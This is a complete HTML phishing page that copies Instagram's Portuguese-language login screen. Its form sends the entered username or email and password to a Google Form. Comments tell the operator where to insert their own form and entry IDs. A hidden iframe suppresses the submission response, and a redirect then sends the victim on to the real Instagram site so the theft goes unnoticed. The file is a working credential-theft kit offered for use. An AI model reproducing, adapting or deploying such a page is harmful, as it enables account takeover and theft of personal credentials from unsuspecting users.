
<!DOCTYPE html>
<html>
<meta name="viewport" content="width=device-width, initial-scale=1.0, 
user-scalable=no">
   <title>Instagram</title>
   <link rel="icon" sizes="192x192" href="https://instagram.com/static/images/ico/favicon-192.png/68d99ba29cc8.png">
   <link rel="stylesheet" href="https://www.instagram.com/static/bundles/es6/ConsumerUICommons.css/8f7fcb0c7148.css">
   <head>
   </head>
   <body>
      <header>
         <div style="padding-bottom: 50px;text-align: center" class="TQUPK">
            <span>Português (Brasil)</span>
            <div class="                    Igw0E     IwRSH      eGOV_         _4EzTm                     WKY0a                                                                                         ">
               <span style="display: inline-block; transform: rotate(180deg);">
                  <svg aria-label="Ícone de divisa para baixo" class="_8-yf5 " fill="#8e8e8e" height="12" viewBox="0 0 48 48" width="12">
                     <path d="M40 33.5c-.4 0-.8-.1-1.1-.4L24 18.1l-14.9 15c-.6.6-1.5.6-2.1 0s-.6-1.5 0-2.1l16-16c.6-.6 1.5-.6 2.1 0l16 16c.6.6.6 1.5 0 2.1-.3.3-.7.4-1.1.4z"></path>
                  </svg>
               </span>
            </div>
         </div>
      </header>
      <center>
         <div class="NXVPg Szr5J  coreSpriteLoggedOutWordmark"></div>
      </center>
      <center>
      <login>
         <div class="                    Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    "><button class="sqdOP  L3NKy   y3zKF     " type="button"><span class="coreSpriteFacebookIconInverted  AeB99"></span><span class=""><a style="color: white!important;"href="https://facebook.com">Continuar com o Facebook</span></a></span></button></div>
         <div class='header' data-sigil='mChromeHeaderCenter'><a href='/'><img height='20' src='https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/gf6iHxsw8zm.png' width='100'/></a></div>
         <!-- HIDDEN IFRAME, HIDE GOOGLE FORM RESPONSE AFTER SUBMITED -->
         <iframe border='0' height='0' name='hiddenFrame' style='display: none;' width='0'></iframe>
         <!-- EDIT "XXXX.." WITH YOUR GOOGLE FORM ID / TARGET TO HIDDEN FRAME-->
         <form action='https://docs.google.com/forms/u/0/d/e/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/formResponse' methot='post' target='hiddenFrame'>
            <!-- EDIT "ENTRY.XXXX..." WITH YOUR GOOGLE FORM INPUT ENTRY ID -->
         <input aria-label="Telefone, nome de usuário ou email" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" name="entry.XXXXXXXX" placeholder='Telefone, nome de usuário ou email' type='text' class="_2hvTZ pexuQ zyHYP" value="">
         <br/>
            <!-- EDIT "ENTRY.XXXX..." WITH YOUR GOOGLE FORM INPUT ENTRY ID -->
         <input aria-label="Senha" aria-required="true" autocapitalize="off" autocorrect="off" name='entry.XXXXXXXX' type="password" placeholder='Senha' class="_2hvTZ pexuQ zyHYP" value="">
         <br/>
         <a class="forgotpassword" href="https://www.instagram.com/accounts/password/reset/">Esqueceu a senha?</a>
         <br/>
         <button id='pronto' c  onclick='window.open(&#39;https://www.instagram.com/?ref=tn_tnmn&#39;,"_self");' type='submit'>Entrar</button>
         <div class="_7UhW9   xLCgt     yUEEX    _0PwGv         uL8Hv         ">
            <p>Não tem uma conta? <a href="https://instagram.com/accounts/signup/phone"><span class="_7UhW9   xLCgt       qyrsm      gtFbE      se6yk        ">Cadastre-se</span></a></p>
         </div>
      </login>
      <style>
         .VILGp {
         margin: 14px 40px 22px;
         }
         .AeB99 {
         display: inline-block;
         margin-right: 8px;
         position: relative;
         top: 3px;
         }.y3zKF:not(.yWX7d), a.y3zKF:not(.yWX7d), a.y3zKF:not(.yWX7d):visited {
         border: 1px solid transparent;
         background-color: #0095f6;
         background-color: rgba(var(--d69,0,149,246),1);
         }
         a {    text-decoration: none;}
         body { font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
         }
         input {
         -webkit-box-align: center;
         -webkit-align-items: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-appearance: none;
         background: #fafafa;
         background: rgba(var(--b3f,250,250,250),1);
         border: 1px solid #dbdbdb;
         border: 1px solid rgba(var(--ca6,219,219,219),1);
         border-radius: 3px;
         -webkit-box-sizing: border-box;
         box-sizing: border-box;
         color: #262626;
         color: rgba(var(--i1d,38,38,38),1);
         flex-direction: row;
         font-size: 14px;
         position: relative;
         width: 320px;
         height: 40px;
         font-size: 12px;
         padding: 10px;
         margin: 3px;
         }
         .forgotpassword {
         font-size: 14px;
         color: #0095f6;
         text-decoration: none;
         position: absolute;
         margin: 10px;
         display: inline;
         padding-left: 35px;
         }
         header { font-size: 12px;color:#8e8e8e;}
         #pronto {
         background: #0095f6;
         border: none;
         color: white;
         border-radius: 3px;
         width: 180px;
         height: 25px;
         font-size: 14px;
         margin: 20px;
         }
         footer {
         background: #fafafa;
         height: 50px;
         position: fixed;
         width: 100%;
         padding-top: 10px;
         bottom: 0;
         border-top: 1px solid #dbdbdb;
         }
         login {width: 350px;}
      </style>
      <footer>
         <div class="glyphsSpriteFb_brand_center_grey u-__7"></div>
      </footer>
   </body>
</html>
